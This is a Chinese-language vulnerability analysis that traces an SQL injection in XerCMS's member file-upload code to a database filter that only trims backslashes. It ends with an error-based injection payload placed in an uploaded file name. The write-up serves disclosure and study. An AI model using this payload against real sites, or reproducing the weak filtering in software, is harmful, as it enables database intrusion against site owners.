xercms \XerCMS\Modules\member\index.php 参数$_FILES SQL注入

sql注入在D:\wamp\www\XerCMS\Modules\member\index.php中的upfiles函数 ``` public function upfiles() { setformat('json'); $config = ini('member/group/'.X::$G['group']); if(empty($config)) { exit('Access Denied'); } else { if($config['upload'][0] == 0) { error('upload_group_limit'); } else if($config['upload'][1] != 0 && X::$G['upload'] > $config['upload'][1]) { error('upload_group_size'); } } $id = int1(g('id')); c('upload')->load($id); $image = ini('image'); if(isset($image['status']{2})) { c('upload')->config['thumbs'] = array(array('width'=>$image['width'],'height'=>$image['height'],'cut'=>$image['cut'],'quality'=>$image['quality'])); } else { if(isset(c('upload')->config['thumbs'])) unset(c('upload')->config['thumbs']); } c('upload')->files(); c('upload')->show(); } ``` 其中这行 ``` c('upload')->files(); ``` 有问题，跟一下该files函数，位于D:\wamp\www\XerCMS\Library\XerCMS_upload.php中 ``` function files() { foreach($_FILES as $k=>$v) { $this->file($k); } } ``` 可以看到进行了文件的相关操作：$_FILES ，再跟一下file函数，位于D:\wamp\www\XerCMS\Library\XerCMS_upload.php中，截取了部分代码 ``` function file($name) { if(isset($_FILES[$name]['tmp_name']) && !empty($_FILES[$name]['tmp_name'])) { $ext = $this->ext($_FILES[$name]['name']); if(in_array(strtolower($ext),$this->forbid) || preg_match('/([^a-z0-9])/i',$ext,$match)) { $this->result[$name]['error'] = 'Ext';return; } if(!empty($this->config['maxsize']) && $_FILES[$name]['size'] > $this->config['maxsize']) { $this->result[$name]['error'] = 'Size';return; } $rid = $this->record($_FILES[$name]); $this->dir($this->config['path'],$rid,$ext); if(is_uploaded_file($_FILES[$name]['tmp_name'])) ``` 其中这里有问题 ``` $rid = $this->record($_FILES[$name]); ``` 可以看到将上传的文件名带入了record函数，该函数位于D:\wamp\www\XerCMS\Library\XerCMS_upload.php ``` function record($upfile) { if (X::$G['uid']) { DB::add('xercms_member_count',array('upload'=>$upfile['size']),array('uid'=>X::$G['uid'])); } DB::insert('xercms_member_upfiles', array('uid'=>X::$G['uid'], 'size'=>$upfile['size'], 'name'=>$upfile['name'], 'time'=>X::$G['time'], 'ip'=>X::$G['ip'], 'type'=>$this->cid)); return DB::lastid(); } ``` 可以看到 ``` $upfile['name'] ``` 也就是我们说的上传文件名，被带入到了DB::insert中，跟一下该函数 ``` static function insert($table,$fields) { if(empty($fields)) { return; } foreach($fields as $k=>$v) { $content[] = '`'.DB::filter($k,'f').'` = \''.DB::filter($v).'\''; } self::query('INSERT INTO '.$table.' SET '.implode(',',$content),self::$connect); return self::lastid(); } ``` 可以看到`$fields`数组经过了过滤，其中数组的key经过了`DB::filter($k,'f')`过滤，数组的值经过了`DB::filter($v)`过滤，再看一下filter函数， ``` static function filter($str,$t = '') { $str = (string)$str; switch($t) { case 'f': return preg_replace('/([^a-z0-9_])/i','',$str); break; default: return trim($str,'\\'); break; } } ``` `$t='f'`时，`return preg_replace('/([^a-z0-9_])/i','',$str);`不能注入 `$t`为空时，只是return trim($str,'\\');可以注入 所以数组的key不能注入，而数组的值可以注入，即文件名可以注入 burp上传截断一下，改一下文件名， ``` 44' or updatexml(1,concat(0x7e,(version())),0) or '.jpg ```